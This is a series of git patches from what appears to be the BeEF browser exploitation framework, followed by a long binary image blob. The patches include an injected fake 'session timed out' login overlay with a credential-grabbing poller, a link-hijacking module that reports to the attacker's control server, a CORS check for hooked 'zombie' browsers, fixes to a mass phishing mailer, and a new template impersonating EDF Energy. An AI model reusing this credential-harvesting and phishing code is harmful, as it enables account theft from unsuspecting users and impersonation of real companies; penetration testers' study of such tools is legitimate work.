+		sneakydiv.innerHTML= '<br><img src=\''+imgr+'\' width=\'80px\' height\'80px\' /><h2>Your session has timed out!</h2><p>For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.</p><table border=\'0\'><tr><td>Username:</td><td><input type=\'text\' name=\'uname\' id=\'uname\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></td><tr><td>Password:</td><td><input type=\'password\' name=\'pass\' id=\'pass\' value=\'\' onkeydown=\'if (event.keyCode == 13) document.getElementById(\"lul\").value=\"Processing..\";\'></input></td></tr></table><br><input type=\'button\' name=\'lul\' id=\'lul\' onClick=\'document.getElementById(\"lul\").value=\"Processing..\";\' value=\'Continue\'>';
+		credgrabber = setInterval(checker,1000);
+
+	}
+	
+	writeit();

From 716e7fe712ba6868d2df56d88e7e2bba441a8948 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Wed, 5 Sep 2012 15:15:56 +0200
Subject: [PATCH 026/397] Change stupid code that made this module unusable
 with the API to something less stupid (i hope)

---
 modules/social_engineering/simple_hijacker/command.js | 8 +++++++-
 modules/social_engineering/simple_hijacker/module.rb  | 2 --
 2 files changed, 7 insertions(+), 3 deletions(-)

diff --git a/modules/social_engineering/simple_hijacker/command.js b/modules/social_engineering/simple_hijacker/command.js
index adcc3e4b2..e924ebb41 100644
--- a/modules/social_engineering/simple_hijacker/command.js
+++ b/modules/social_engineering/simple_hijacker/command.js
@@ -24,7 +24,13 @@ hijack = function(){
       if ($j(this).attr('href') != '')
       { 
         if( <% target.each{ |href| %> $j(this).attr('href').indexOf("<%=href%>") != -1 <% if href != target.last %> || <% else %> ) <% end %><% } %>{			
-          <%= instance_variable_get("@#{@choosetmpl}") %>
+          <%
+              tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{@choosetmpl}.js"
+              file = File.open(tplpath, "r")
+              @template = file.read
+          %>
+          
+          <%= @template %>
           beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Template "<%= @choosetmpl %>" applied to '+$j(this).attr('href'));
         }
       }
diff --git a/modules/social_engineering/simple_hijacker/module.rb b/modules/social_engineering/simple_hijacker/module.rb
index d9a66c1dd..6a40a85ed 100644
--- a/modules/social_engineering/simple_hijacker/module.rb
+++ b/modules/social_engineering/simple_hijacker/module.rb
@@ -29,8 +29,6 @@ class Simple_hijacker < BeEF::Core::Command
     @templates.each{ |template|
       tplpath = "#{$root_dir}/modules/social_engineering/simple_hijacker/templates/#{template}.js"
         raise "Invalid template path for command template #{template}" if not File.exists?(tplpath)
-        file = File.open(tplpath, "r")
-        data.push({'name' => template, 'type' => 'hidden', 'value' => file.read})
       tmptpl<<[ template]
     }
  

From 085f2775f37e81e62e4448e4a45ab4020baacf9d Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Thu, 6 Sep 2012 17:50:27 +0930
Subject: [PATCH 027/397] Added `beef.browser.hasCors()` function

---
 core/main/client/browser.js | 19 +++++++++++++++++--
 1 file changed, 17 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 42bfcaca0..519285a08 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -605,8 +605,8 @@ beef.browser = {
 	 * Checks if the Phonegap API is available from the hooked domain.
 	 * @return: {Boolean} true or false.
 	 *
-	 * @example: if(beef.browser.hasJava()) { ... }
-	*/
+	 * @example: if(beef.browser.hasPhonegap()) { ... }
+	 */
 	hasPhonegap: function() {
 		var result = false;
 		try { if (!!device.phonegap) result = true; else result = false; }
@@ -614,6 +614,21 @@ beef.browser = {
 		return result;
 	},
 
+	/**
+	 * Checks if the browser supports CORS
+	 * @return: {Boolean} true or false.
+	 *
+	 * @example: if(beef.browser.hasCors()) { ... }
+	 */
+	hasCors: function() {
+		if ('withCredentials' in new XMLHttpRequest())
+			return true;	
+		else if (typeof XDomainRequest !== "undefined")
+			return true;
+		else
+			return false;
+	},
+
 	/**
 	 * Checks if the zombie has Java installed and enabled.
 	 * @return: {Boolean} true or false.

From 2f5fc46a8e64774b7ccdbe05e98de7c3f9b1de48 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 6 Sep 2012 11:26:31 +0100
Subject: [PATCH 028/397] Social Eng. Extension: fixed a bug in mass_mailer
 when choosing a different template.

---
 .../mass_mailer/mass_mailer.rb                | 32 ++++++++++++-------
 .../rest/socialengineering.rb                 |  2 +-
 2 files changed, 22 insertions(+), 12 deletions(-)

diff --git a/extensions/social_engineering/mass_mailer/mass_mailer.rb b/extensions/social_engineering/mass_mailer/mass_mailer.rb
index 221ca73e7..31e0f6a19 100644
--- a/extensions/social_engineering/mass_mailer/mass_mailer.rb
+++ b/extensions/social_engineering/mass_mailer/mass_mailer.rb
@@ -83,18 +83,20 @@ module BeEF
            rel_boundary = "------------#{random_string(24)}"
 
            header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
-           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain"),boundary)
+           plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
            rel_header = email_related(rel_boundary)
-           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html"),rel_boundary)
+           html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
 
            images = ""
-           @config.get("#{@config_prefix}.templates.default.images").each do |image|
+           @config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
              images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
            end
 
            attachments = ""
-           @config.get("#{@config_prefix}.templates.default.attachments").each do |attachment|
-             attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+           if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
+             @config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
+               attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
+             end
            end
 
            close = email_close(boundary)
@@ -197,9 +199,9 @@ EOF
         end
 
         # Replaces placeholder values from the plain/html email templates
-        def parse_template(name, link, linktext, template_path)
+        def parse_template(name, link, linktext, template_path, template)
           result = ""
-          img_config = "#{@config_prefix}.templates.default.images_cids"
+          img_config = "#{@config_prefix}.templates.#{template}.images_cids"
           img_count = 0
           File.open(template_path, 'r').each do |line|
              # change the Recipient name
@@ -207,13 +209,21 @@ EOF
                result += line.gsub("__name__",name)
              # change the link/linktext
              elsif line.include?("__link__")
-               result += line.gsub("__link__",link).gsub("__linktext__",linktext)
+               if line.include?("__linktext__")
+                 result += line.gsub("__link__",link).gsub("__linktext__",linktext)
+               else
+                 result += line.gsub("__link__",link)
+               end
              # change images cid/name/alt
              elsif line.include?("src=\"cid:__")
                img_count += 1
-               result += line.gsub("__cid#{img_count}__",
-                                   @config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
-                                   @config.get("#{img_config}.cid#{img_count}"))
+               if line.include?("name=\"img__") || line.include?("alt=\"__img")
+                 result += line.gsub("__cid#{img_count}__",
+                                     @config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
+                                     @config.get("#{img_config}.cid#{img_count}"))
+               else
+                 result += line.gsub("__cid#{img_count}__",@config.get("#{img_config}.cid#{img_count}"))
+               end
              else
                result += line
              end
diff --git a/extensions/social_engineering/rest/socialengineering.rb b/extensions/social_engineering/rest/socialengineering.rb
index cc3470333..a6aa9d188 100644
--- a/extensions/social_engineering/rest/socialengineering.rb
+++ b/extensions/social_engineering/rest/socialengineering.rb
@@ -102,7 +102,7 @@ module BeEF
               halt 401
             end
 
-            if (link =~ URI::regexp).nil? || (linktext =~ URI::regexp).nil?#invalid URI
+            if (link =~ URI::regexp).nil?#invalid URI
               print_error "Invalid link or linktext"
               halt 401
             end

From 64ba4686f4d0c5f5a5d007961efe93d1b8f2b60c Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 6 Sep 2012 11:27:12 +0100
Subject: [PATCH 029/397] Social Eng. Extension: added EDF Energy phishing
 template :D

---
 .../mass_mailer/templates/edfenergy/2012.png  | Bin 0 -> 9416 bytes
 .../templates/edfenergy/bottom-border.png     | Bin 0 -> 33433 bytes
 .../templates/edfenergy/corner-bl.png         | Bin 0 -> 2902 bytes
 .../templates/edfenergy/corner-br.png         | Bin 0 -> 2893 bytes
 .../templates/edfenergy/corner-tl.png         | Bin 0 -> 2900 bytes
 .../templates/edfenergy/edf_logo.png          | Bin 0 -> 6982 bytes
 .../mass_mailer/templates/edfenergy/mail.html |  54 ++++++++++++++++++
 .../templates/edfenergy/mail.plain            |  19 ++++++
 .../mass_mailer/templates/edfenergy/main.png  | Bin 0 -> 56684 bytes
 .../templates/edfenergy/promo-corner-left.png | Bin 0 -> 3015 bytes
 .../edfenergy/promo-corner-right-arrow.png    | Bin 0 -> 864 bytes
 .../templates/edfenergy/promo-reflection.png  | Bin 0 -> 3576 bytes
 12 files changed, 73 insertions(+)
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/2012.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/bottom-border.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/corner-bl.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/corner-br.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/corner-tl.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/edf_logo.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/main.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-left.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/promo-corner-right-arrow.png
 create mode 100644 extensions/social_engineering/mass_mailer/templates/edfenergy/promo-reflection.png

diff --git a/extensions/social_engineering/mass_mailer/templates/edfenergy/2012.png b/extensions/social_engineering/mass_mailer/templates/edfenergy/2012.png
new file mode 100644
index 0000000000000000000000000000000000000000..9a7d904deacbb72ef05e438f657a1c380563fe20
GIT binary patch
literal 9416
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
